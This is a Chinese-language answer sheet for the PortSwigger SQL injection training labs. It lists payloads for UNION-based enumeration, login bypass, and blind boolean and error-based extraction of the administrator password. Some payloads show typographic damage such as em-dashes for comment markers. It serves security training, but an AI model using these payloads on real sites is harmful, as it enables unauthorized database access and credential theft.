portswigger网站sqli lab答案

lab1：

SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
Use Burp Suite to intercept and modify the request that sets the product category filter.
Modify the category parameter, giving it the value '+OR+1=1–
Submit the request, and verify that the response now contains additional items.

lab2:

SQL injection vulnerability allowing login bypass
’ or 1=1–

lab3:

SQL injection UNION attack, determining the number of columns returned by the query
'union select null–
'union select null,null–
'union select null,null,null–

lab4：

SQL injection UNION attack, finding a column containing text
’ union select 1,‘abc’,3–

lab5：

SQL injection UNION attack, retrieving data from other tables
'+union+select+username,password+from+users–

lab6：
Lab: SQL injection UNION attack, retrieving multiple values in a single column
’ union select null,username||password from users–

lab7:

querying the database type and version on Oracle
’ union select null,banner from v$version–

lab8:

querying the database type and version on MySQL and Microsoft
’ union select @@version,null#

lab9:

listing the database contents on non-Oracle databases
从信息栏获取表名：
’ union select table_name,null from information_schema.tables–
从表名获取列名:
'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name=%27users_yompgr%27–
从表名中列出列名下的内容：
'+UNION+SELECT+username_qbfrci,password_wajxec+FROM+users_yompgr–

lab10:

listing the database contents on Oracle
获取列数：
’ union select null, null+from DUAL–
获取表名：
’ union select table_name, null+from all_tables–
获取列名：
’ union select column_name, null from all_tab_columns where table_name=‘USERS_DATVNK’–
获取内容：
’ union select USERNAME_OAEXQH,PASSWORD_HFKPMZ from USERS_DATVNK–

lab11:

Blind SQL injection with conditional responses
cookie中是否有users这个表？
’ and (select ‘a’ from users limit 1)=‘a’–
表中是否有administrator这一行？
’ and (select ‘a’ from users where username=‘administrator’ limit 1)=‘a’–
判断密码位数
’ and (select ‘a’ from users where username=‘administrator’ and length(password)=20 limit 1)=‘a’–
判断每一位密码字符(n密码长度，从1到n，a是字符表集合（0-9，a-z,A-Z，特殊符号）)：
’ and (select substring(password,$n$,1) from users where username=‘administrator’)=‘$a$’–

lab12：

Blind SQL injection with conditional errors
证明有注入条件：
’ error
‘’ ok
猜测数据库类型：
’ || (select ‘’) ||’ error
’ || (select ‘’ from dual) || ’ ok–>oracle database
确定数据库名称：
’ || select ‘’ from users where rownum=1) || ’
确定administrator在users表中：
’ || (select ‘’ from users where username=‘administrator’) || ’ -->ok
或者(smarter)：
’ || (select CASE WHEN (1=1) _ THEN _ ELSE _ END FROM dual) || ’ --statement_1
’ || (select CASE WHEN (1=0) THEN TO_CHAR(1/0) ELSE ‘’ END FROM DUAL) || ’ --statement_2–>true
’ || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE ‘’ END FROM users where username=‘administrator’) || ’ -statement_2–>true --statement_3–>false
确定密码位数：
可以用statement_2 加上and length(password)>1 -->获取true则正确，直到false位置为正确位数，反之
statement_3加上and length(password)>1 -->获取false则说明错误，直到true位置则为正确位置
暴力猜解每一位的字符：
’ || (select case when (1=1) then to_char(1/0) else ‘’ end from users where username=‘administrator’ and substr(password,1,1)=‘$a$’ ’ -->true,a不是